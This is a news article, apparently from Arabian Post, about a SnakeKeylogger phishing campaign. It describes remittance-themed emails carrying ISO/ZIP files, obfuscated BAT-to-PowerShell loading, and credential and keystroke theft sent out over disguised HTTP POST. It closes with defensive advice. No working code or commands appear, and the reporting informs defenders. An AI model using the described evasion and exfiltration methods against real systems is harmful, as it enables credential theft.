Just in:
Most UAE expats under-insured, reveals survey // Alibaba Cloud gains edge in agentic AI race // Taiwan International Plant-Based Festival Launches in Singapore: High-End Culinary Partnerships and Diplomatic Exhibitions Shape Premium Agri-Product Branding // DSQ Real Estate Highlights Post-Purchase Advisory as a Growing Need for Overseas Dubai Property Owners // Bracell Welcomes Fernando Branco’s Appointment to Lead ABAF and Reinforces Commitment to Sustainable Forestry Development in Bahia // China’s digital hub Hangzhou hosts conference on AI, OPC // BateriHub, Global Energy Battery Partner MNA Metal to Tighten Malaysia’s Used Battery Recycling Chain // Afogreen Build Highlights Growing Adoption of Building Performance Modelling in Australia’s Sustainability-Driven Construction Sector // Payments giants back shared Open USD stablecoin // Bid To Rebuild Bengal To Its Old Glory Is Welcome, Though Difficult // Cheap RAT spreads through Telegram channels // World’s First Commercial Multimodal LLM for Cultural Tourism Enters Broad Application // France and Oman press toll-free Hormuz passage // 5 Law Firms Making a Difference in Cincinnati // Tehran blocks French role in Hormuz clearance // Hawaii tests plastic waste in roads // PRHK 2026 Benchmark Report highlights how Hong Kong’s IPO revival, AI, and the GBA are reshaping the SAR’s PR industry // This summer will never stop us from our wellness routine // Abu Dhabi starts new Saadiyat arts landmark // Binzhou’s Leap from Manufacturing to Intelligent Manufacturing //

SnakeKeylogger Surfaces with New Email-to-PowerShell Attack Chain

A fresh campaign deploying SnakeKeylogger is targeting users with weaponized emails that lead to the execution of PowerShell scripts and ultimately exfiltrate sensitive data. Security analysts warn that the threat now blends social engineering with native Windows scripting to evade detection.

Emails purporting to be from “CPA-Payment Files” or similar remittance services carry attachments—most often ISO or ZIP files. Once opened, these contain a malicious BAT file that launches PowerShell commands to fetch a secondary payload. That payload is the SnakeKeylogger executable, which then installs itself, harvests data and communicates with its command and control servers. The malware captures keystrokes, browser credentials, system metadata, and cookies before transmitting encrypted logs.
This attack chain was first observed on 7 October 2025, when several recipients reported emails titled “remittance advice for the payment dated 07-Oct-2025”. The attackers rely on both obfuscation and native scripting to stay under the radar.

Earlier iterations of SnakeKeylogger have used phishing campaigns that deliver the malware via Excel or HTA files. In one such campaign, Fortinet researchers documented how an Excel attachment exploited the CVE-2017-0199 vulnerability to drop a PowerShell loader, which in turn deployed the keylogger. That version already sought to steal browser-saved credentials, clipboard contents, and keystroke data.
Over time, the malware evolved: later variants introduced persistence via scheduled tasks, registry run keys, or blending with system processes to mask their presence. In some campaigns, attackers impersonated defence contractors to lend legitimacy to their email lures.

ADVERTISEMENT

The current campaign adds two noteworthy refinements: first, the use of ISO and ZIP containers to bypass email filters that block Office documents; second, the invocation of PowerShell via obfuscated BAT scripts to reduce forensic footprints. Analysts trace much of the attack logic to embedded Base64 strings decoded at runtime to build download URLs and commands. Once the loader is in place, it stages SnakeKeylogger inside trusted processes to avoid triggering heuristics tied to newly spawned binaries.

Exfiltration occurs through HTTP POST requests disguised as legitimate telemetry to PHP endpoints on attacker-controlled domains. To evade network defenders, exfiltration intervals are randomized and local queuing is used if the C2 endpoint is unavailable. The collected data is encrypted using AES-256 GCM, with the encryption key derived from the machine’s GUID and a salt. If detection occurs, the campaign may fall back to queuing for later retry.

Defence recommendations from cybersecurity firms include enforcing stringent email content filters, enabling PowerShell execution policies, and activating script block logging. Endpoint protection tools should monitor registry changes, command-line invocations, and anomalous network traffic, particularly POST requests to domains not tied to legitimate corporate services.



Notice an issue?

Arabian Post strives to deliver the most accurate and reliable information to its readers. If you believe you have identified an error or inconsistency in this article, please don't hesitate to contact our editorial team at editor[at]thearabianpost[dot]com. We are committed to promptly addressing any concerns and ensuring the highest level of journalistic integrity.


ADVERTISEMENT
Social Media Auto Publish Powered By : XYZScripts.com